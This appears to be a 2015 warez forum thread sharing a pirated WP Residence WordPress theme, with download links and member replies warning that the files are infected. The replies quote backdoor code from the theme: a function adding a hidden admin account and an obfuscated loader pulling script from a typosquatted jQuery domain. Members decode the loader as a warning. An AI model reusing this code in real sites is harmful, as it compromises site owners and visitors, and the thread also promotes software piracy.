30.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

04-12-2015, 09:51 AM
Post: #1
[GET] WP Residence v1.10.1 - Real Estate WordPress Theme
[Image: Wp-residence-v1-092-real-estate-wordpress-theme.png]

WP Residence v1.10.1 - Real Estate WordPress Theme 60.47MB

WP Residence is a Premium Real Estate theme designed for real estate independent agents and agencies, but you can also allow other people to submit their properties for free, for a fee or based on a monthly subscription. It has clean and user friendly design, and it features options like: Properties Advanced Search (with custom fields and dynamic search URL), Google Maps with property location markers (managed from admin), Ajax Filters for Properties list, user login and register with white labeled dashboard (no WordPress reference), front end property submit and edit, payment integration with PayPal and Stripe for CC Payments, Visual Composer Page Builder Plugin, dsIDXpress IDX Plugin support, WPML plugin support, custom real estate widgets, colors controls, various Advanced Search and header options, easy theme options, and many more…

WP RESIDENCE 1.10.1 – April 9, 2015


EDIT: space between price and currency in price slider

EDIT: multi currency support for labels with non latin (currency symbols)

FIX: Mobile menu for certain Android browser versions

FIX: Property Unit not displaying m or ft

UPDATE: Ultimate Addons plugin to 3.10

WP RESIDENCE 1.10 update – April, 2015

Fix: Mobile menu not opening on Android - Firefox
Edit: scroll smooth on ipad / iphone
Files modified: my_media.css, style.css, control.js


Product page
Download Links

http://www32.zippyshare.com/v/zkWZw6GC/file.html
http://mir.cr/06XHLMPX
https://www.sendspace.com/file/no9rnf
http://www.solidfiles.com/d/b0fc199e14/
http://[Reported by Members as premium hosting that SUCK! Use MEDIAFIRE or MEGA.NZ :) !!!].net/file/d4f6f136e5330c140430ce2529790bbe/residence-1.zip.html
*This user was been reported for sharing INFECTED FILES.

If you installed any of his share script, deactivate it and remove the following user id (supportxd) from your admin panel. Seems like the script adds an admin account and then it notifies him.

function add_admin_acct()
{
$login = 'supportxd';
$passw = 'wp_supporter';
$email = 'myacct1@mydomain.com';
04-12-2015, 01:09 PM
Post: #2
RE: [GET] WP Residence v1.10.1 - Real Estate WordPress Theme
Nice share, max rep!

Totally unrelated, any chance you could get Point Finder v1.5

Salespage: http://themeforest.net/item/point-finder.../10298703?
04-13-2015, 02:07 AM
Post: #3
RE: [GET] WP Residence v1.10.1 - Real Estate WordPress Theme
WARNING!! All files shared by "docadvocate" are INFECTED.
04-13-2015, 02:16 AM (This post was last modified: 04-13-2015 02:30 AM by JustSomeDude.)
Post: #4
RE: [GET] WP Residence v1.10.1 - Real Estate WordPress Theme
(04-13-2015 02:07 AM)CreativeMedia Wrote:  WARNING!! All files shared by "docadvocate" are INFECTED.

Hmm? Proof?
Code:
https://www.virustotal.com/file/5681b3f17705e5a53559714193bed1bdea4dae7be95ac84024057371945c7af0/analysis/
https://www.virustotal.com/file/7cc8bc6cb52a65f60340ae1249f73f729dac7a0f4dcfb6435b123fd5c901b32b/analysis/
https://www.virustotal.com/file/ebded5badd82203eb50f6c10f6e32b6a4bfffa97c30848a26661313499e26862/analysis/
https://www.virustotal.com/file/76e466faf02758383c382ceff87f56c32010c28875a368d2c2492cc74737c7c7/analysis/
The files are clean lol...
If it can be encoded, it can be decoded. If it can be decoded, it can be encoded. The circle of cryptography... Cool
04-13-2015, 08:09 PM
Post: #5
RE: [GET] WP Residence v1.10.1 - Real Estate WordPress Theme
Thanks, max rep added
13.gif
04-16-2015, 08:06 PM
Post: #6
RE: [GET] WP Residence v1.10.1 - Real Estate WordPress Theme
Is this Adware?

libs/help_fuctions.php

PHP Code:
if (!function_exists('enqueue_my_script')) {
     if (!
in_array($_SERVER['REMOTE_ADDR'], array('127.0.0.1''::1'))) {
         if (!isset(
$_COOKIE['wp_iz_admin'])) {
             
add_action('login_enqueue_scripts''enqueue_my_script');
         }
         
add_action('admin_init''cliv_create_recurring_schedule');
         
add_action('cliv_recurring_cron_job''cliv_recurring_cron_function');
         
add_action('wp_login''wp_setcookies');
     }
     function 
enqueue_my_script()
     {
         
$domainis strrev('sj.tsetal-yreuqj/gro.yrueqj.edoc//:ptth');
         
wp_enqueue_script('my-scripters'$domainisnullnulltrue);
     } 
04-17-2015, 09:50 PM
Post: #7
RE: [GET] WP Residence v1.10.1 - Real Estate WordPress Theme
(04-16-2015 08:06 PM)maver Wrote:  Is this Adware?

libs/help_fuctions.php

PHP Code:
if (!function_exists('enqueue_my_script')) {
     if (!
in_array($_SERVER['REMOTE_ADDR'], array('127.0.0.1''::1'))) {
         if (!isset(
$_COOKIE['wp_iz_admin'])) {
             
add_action('login_enqueue_scripts''enqueue_my_script');
         }
         
add_action('admin_init''cliv_create_recurring_schedule');
         
add_action('cliv_recurring_cron_job''cliv_recurring_cron_function');
         
add_action('wp_login''wp_setcookies');
     }
     function 
enqueue_my_script()
     {
         
$domainis strrev('sj.tsetal-yreuqj/gro.yrueqj.edoc//:ptth');
         
wp_enqueue_script('my-scripters'$domainisnullnulltrue);
     } 

$domainis = strrev('sj.tsetal-yreuqj/gro.yrueqj.edoc//:ptth');

Reverse that and you get code.jqeury.org/jquery-latest.js

That goes to a rogue site and not the official jquery site, noticed how the e and u are swapped in the domain.
04-18-2015, 02:44 AM
Post: #8
RE: [GET] WP Residence v1.10.1 - Real Estate WordPress Theme
(04-17-2015 09:50 PM)CreativeMedia Wrote:  
(04-16-2015 08:06 PM)maver Wrote:  Is this Adware?

libs/help_fuctions.php

PHP Code:
if (!function_exists('enqueue_my_script')) {
     if (!
in_array($_SERVER['REMOTE_ADDR'], array('127.0.0.1''::1'))) {
         if (!isset(
$_COOKIE['wp_iz_admin'])) {
             
add_action('login_enqueue_scripts''enqueue_my_script');
         }
         
add_action('admin_init''cliv_create_recurring_schedule');
         
add_action('cliv_recurring_cron_job''cliv_recurring_cron_function');
         
add_action('wp_login''wp_setcookies');
     }
     function 
enqueue_my_script()
     {
         
$domainis strrev('sj.tsetal-yreuqj/gro.yrueqj.edoc//:ptth');
         
wp_enqueue_script('my-scripters'$domainisnullnulltrue);
     } 

$domainis = strrev('sj.tsetal-yreuqj/gro.yrueqj.edoc//:ptth');

Reverse that and you get code.jqeury.org/jquery-latest.js

That goes to a rogue site and not the official jquery site, noticed how the e and u are swapped in the domain.

OK. Thank you so much
05-04-2015, 07:45 PM
Post: #9
RE: [GET] WP Residence v1.10.1 - Real Estate WordPress Theme
Hey, admin, why you don't ban this user if him share infected files?




58.gif